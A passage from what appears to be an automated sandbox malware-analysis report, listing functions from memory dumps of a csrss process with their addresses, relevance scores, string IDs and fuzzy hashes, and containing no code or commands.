                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: 6d0a1a6bd17763c651413d58049451a6e0ce21457d75129259be45e47f46a2a0
                                      • Instruction ID: a310616f3cb36de21dcb3b2c99992f97c09e37a1b927e53d8f53489ea525434a
                                      • Opcode Fuzzy Hash: 6d0a1a6bd17763c651413d58049451a6e0ce21457d75129259be45e47f46a2a0
                                      • Instruction Fuzzy Hash: 9E9103B191CAA98FE799EF6CCC657B97FE1FB59300F1001BAC05AD72D2CA7818128741
                                      Function 00007FFB4AE21142 Relevance: 9.7, Strings: 7, Instructions: 917COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: f6a93154a2050beedbb34ca4a3a47becf2b0f86200e219fcd009d9af25ff05b5
                                      • Instruction ID: 974d46eef20429f1cf5060412fcfc56fb12ca66c7e262c0649a997fd5e655a6c
                                      • Opcode Fuzzy Hash: f6a93154a2050beedbb34ca4a3a47becf2b0f86200e219fcd009d9af25ff05b5
                                      • Instruction Fuzzy Hash: 8262D4B1A5DA1A8FE798FF38C5A16B87795FF98300F2405F9D41DC3286CD28AD468781
                                      Function 00007FFB4AE43515 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: 20d89f60e5aff2f86cf636294b8e5e0abf1e2349b803bb8b7e56b7ea82289148
                                      • Instruction ID: 1315d16546ac88bf4568af4dfe32bd7318551f60a8e4530ca187ceeaf7522867
                                      • Opcode Fuzzy Hash: 20d89f60e5aff2f86cf636294b8e5e0abf1e2349b803bb8b7e56b7ea82289148
                                      • Instruction Fuzzy Hash: 139103A1A5CA5B4FF788FE38C4562B976CDFB98300F2441F9D45DC7287DD28A8468781
                                      Function 00007FFB4AE108D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 08b089fcd017565f16209849d45bb46062b92c84a29518b07ab3d34fda5f27fa
                                      • Instruction ID: 4e57b3261dbe4b195780161a80404492ee2e6e67eab22e8ac3349bba5fd433c8
                                      • Opcode Fuzzy Hash: 08b089fcd017565f16209849d45bb46062b92c84a29518b07ab3d34fda5f27fa
                                      • Instruction Fuzzy Hash: 30415AA2A4D6B54AE306BB78E09A1FD7F94DF45324B2445FFD94ECB093CD0868528291
                                      Function 00007FFB4AE10960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 9bafe6b2df8ffb71fa3cc4230ddbcf0ea01371609a1ec6924e70a4ed2b1ea535
                                      • Instruction ID: a43106c3087016ba803f0907762371026c3b7d62df57881f539ae351eb414184
                                      • Opcode Fuzzy Hash: 9bafe6b2df8ffb71fa3cc4230ddbcf0ea01371609a1ec6924e70a4ed2b1ea535
                                      • Instruction Fuzzy Hash: 183145A1A4EAA61EF315BA7CE09A5F97BC5EF45321B6401FED80EC71D3CC18A8434291
                                      Function 00007FFB4AE10998 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 449755f48a5710b699f3af3f6bdb08c057a5e16ad8ceacce32ecf6280b82dca4
                                      • Instruction ID: 118748ddf20d97463cbc6ad5f48a55e288967e73b7ebe145be5d70d2a12808f6
                                      • Opcode Fuzzy Hash: 449755f48a5710b699f3af3f6bdb08c057a5e16ad8ceacce32ecf6280b82dca4
                                      • Instruction Fuzzy Hash: DB3134A0B4D9A91FE749BA3CD09AABA7BD6EF48310B6400FDD40EC3293DC149C428381
                                      Function 00007FFB4AE43049 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction ID: a22ddae03843cab328321067345e9ea6eab528daaf545d61559a51b261fc2575
                                      • Opcode Fuzzy Hash: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction Fuzzy Hash: 2FF0656154E7C44FC716EA7488694557F60EF6721174A46EFC045CF1A3DA1D8C89C741
                                      Function 00007FFB4AE41D69 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction ID: e81f38eb0dd38b7ecaa1100520948066fd7da0e4314703f698e60b83ea8287eb
                                      • Opcode Fuzzy Hash: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction Fuzzy Hash: 80F065A154E7D04FCB16AA7488644557F64EF6720174A41EEC055CF1A7DA1DCC45C741
                                      Function 00007FFB4AE47FF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction ID: b93b4db01bcfaf825da838150498bcb20557062491ad12b1cd2106eff28bfb05
                                      • Opcode Fuzzy Hash: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction Fuzzy Hash: 64E01AA154E7D04FDB0AAF7488658443FA0EE6B25178B40EEC185CF1F3E62D8C49C711
                                      Function 00007FFB4AE41DF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction ID: cd78cf4ed60cd66d7890b0e60c129ecb6dc8d58320db06e70792f71a2db1c347
                                      • Opcode Fuzzy Hash: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction Fuzzy Hash: 87E01AA154E7E04FCB16AA7488659453FA4EE6B21178A40EEC045CF1A3E62DC84AC741
                                      Function 00007FFB4AE4A879 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction ID: 380bbaed15bd81d06552504bee7a3d08fe52395b51a7c4703365778288f4c253
                                      • Opcode Fuzzy Hash: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction Fuzzy Hash: 5BE0E56294E7C44FCB1AAA3488699547FA0AE6B21178A40EEC045CB1A3E62D9849C701
                                      Function 00007FFB4AE10908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Function 00007FFB4AE4AE55 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b79a897377dce4a2ff5ccb9bbc62b027810d9406472ff520abccdc9c90618aeb
                                      • Instruction ID: d796f4a04ebcf5a73d5c5ac7ea5aadba160c5f5ddf8adad6f3d8ee9639752e19
                                      • Opcode Fuzzy Hash: b79a897377dce4a2ff5ccb9bbc62b027810d9406472ff520abccdc9c90618aeb
                                      • Instruction Fuzzy Hash: D13193E1A5DD6B4FE695FE3CC4952B866CDFB98310BB400F9D45DC3286DC28AC465341
                                      Function 00007FFB4AE1116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 724f56925b0484330fec487ebcb22191d0772e084bd5d076a7d5870c95b4e99c
                                      • Instruction ID: ef9935cc2e8d2529fb595ff5cb554d4a0e363159ba859e17906acb16803bc30f
                                      • Opcode Fuzzy Hash: 724f56925b0484330fec487ebcb22191d0772e084bd5d076a7d5870c95b4e99c
                                      • Instruction Fuzzy Hash: 3A31AF71A0D65A8FDB45FF78C8549B97BE0FF59310B2405FAC01AC72A2DB29A441CB40
                                      Function 00007FFB4AE10C25 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction ID: 974b50c8666947e9088af8039315baf181a23fec360c5d113aa71021d0657cf3
                                      • Opcode Fuzzy Hash: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction Fuzzy Hash: 4811C0B5A4C66A8BF312BF34C9112BC7F64EF42364F3581F2C0558B1C2D92825478B91
                                      Function 00007FFB4AE424E6 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94878b211e506a6e33f02ce2954432ca97f327bda9292f1b348a1677e3e30ebc
                                      • Instruction ID: abd8305aaac4f719777c5da3d9a3e6a3f8c36f03b9331031a619c32593daed43
                                      • Opcode Fuzzy Hash: 94878b211e506a6e33f02ce2954432ca97f327bda9292f1b348a1677e3e30ebc
                                      • Instruction Fuzzy Hash: 1001C872E4C9298FE794FE58C8643B87399FB54310F2502F9D45DC72C6DD2868454782
                                      Function 00007FFB4AE4D4FC Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37c160dc7e64aa019192298134ad775700d517e6988ae12545cc0b568817c9ea
                                      • Instruction ID: b2206a74847b41cd6360ae2ad098f0453ea7a6166ebd113975390ad33f45becb
                                      • Opcode Fuzzy Hash: 37c160dc7e64aa019192298134ad775700d517e6988ae12545cc0b568817c9ea
                                      • Instruction Fuzzy Hash: 8F0188B1E485298BEB55FE69D9853F972AAFBD4314F3440B1C05A96188CD3DE8428B81
                                      Function 00007FFB4AE240A6 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e120b6554c9539775fa01be4c0c0f09a5ac8067b70e1c489d45c686584bf6dd9
                                      • Instruction ID: 530ad77d3c9391d3dd29ebcc470bb11205d082294ddb5e2b5ff565085176d72b
                                      • Opcode Fuzzy Hash: e120b6554c9539775fa01be4c0c0f09a5ac8067b70e1c489d45c686584bf6dd9
                                      • Instruction Fuzzy Hash: 9E01B1B2A1DA0B8BE719FF68C8645FD7BA5FB44310F2002B6C02AC7195CF7829058782
                                      Function 00007FFB4AE24081 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee8edbd940ba31f1436641b92be4de0794ca24fab024366a9cedf3f8e8218770
                                      • Instruction ID: ba2bc1d73d66db218a95e68546199446c58580a81bdcf91e82544702fd4c9d76
                                      • Opcode Fuzzy Hash: ee8edbd940ba31f1436641b92be4de0794ca24fab024366a9cedf3f8e8218770
                                      • Instruction Fuzzy Hash: 1801A7B1918A1B8AEB15FF58C8246FE77B8FF44314F604276D026872C4CFB465458782
                                      Function 00007FFB4AE25DB5 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a58a3584519df1384e0dfe99495fa5920b9c26edd212bebc18fb3ed16bd92a27
                                      • Instruction ID: 4edef9c8086a749d333d4daddb81cab59a41511aa2cebd5b129b766541c9dcf7
                                      • Opcode Fuzzy Hash: a58a3584519df1384e0dfe99495fa5920b9c26edd212bebc18fb3ed16bd92a27
                                      • Instruction Fuzzy Hash: 9F01A5B0D5C92D8FDBD4FF18C895BA8B6A1FB68300F2041E5D01DD3251CE3869858F41
                                      Function 00007FFB4AE249AB Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction ID: 2ea1fe3ee4721c6ac62d3cbdf494fea951a6b4f256d9f848cf8c1f432781f854
                                      • Opcode Fuzzy Hash: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction Fuzzy Hash: 9FF054B2A5C95B4BF755BE2CD9606B93298FF19310F3542F5E43DC71C6EE28E8014682
                                      Function 00007FFB4AE10B77 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction ID: 8b41a40c0d551346ee7a166067a75d230b3a08b906b5a3bdc6ce04d588864a3f
                                      • Opcode Fuzzy Hash: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction Fuzzy Hash: 3BF0A03515DA55CFC742EB3CC8E58D5BF60FF02205B9A01FAD089CB5A2D315585ECB41
                                      Function 00007FFB4AE4A7E9 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction ID: eb08d1d0e9e519e8c34edc9bc61880866140a6f7e2ac57b6a0f11600102a4089
                                      • Opcode Fuzzy Hash: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction Fuzzy Hash: 00F0E522B4DBC84FC729AA2D4869061BFF5DB9B21234941FFC496C72E3ED58AC858341
                                      Function 00007FFB4AE4A379 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction ID: dd883564e53e479445ebf6156c541233331ba38a00a062757bf747cc0926c757
                                      • Opcode Fuzzy Hash: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction Fuzzy Hash: E0E02B7150E7C04FC705AA3484594947FA0EFA721134942EFC045CF1E3EA2CCC89C700
                                      Function 00007FFB4AE4A2E9 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction ID: 1bab3d9375fd886bab1a6da384e0890cf31466f9860bcf7a427805b36666ecb0
                                      • Opcode Fuzzy Hash: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction Fuzzy Hash: 14F0E57150E7C04FC706AA3888294507FA0EF6721134A46EFC045CF1E3EA2D8C88C701
                                      Function 00007FFB4AE10C6C Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Function 00007FFB4AE47764 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction ID: 7d9b2f4199c3c34ede9515398215e465beb115fe01245bc273b6c29d1eed1104
                                      • Opcode Fuzzy Hash: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction Fuzzy Hash: 5CE0E56198E7D04FC74B9B7488688947FB4EE5722178A84EEC0898F1E3D669984AC742
                                      Function 00007FFB4AE4D679 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction ID: 437ef8355eb90a2483f1e29550f55d8ce66b73da8277851049454e5fcd509aa5
                                      • Opcode Fuzzy Hash: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction Fuzzy Hash: 46E01A6284E7C04FCB0A9A7488A88903F64EF6721179A40EBC045CF5A3D9198849C701
                                      Function 00007FFB4AE154B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Function 00007FFB4AE4A390 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE4A300 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE246B2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
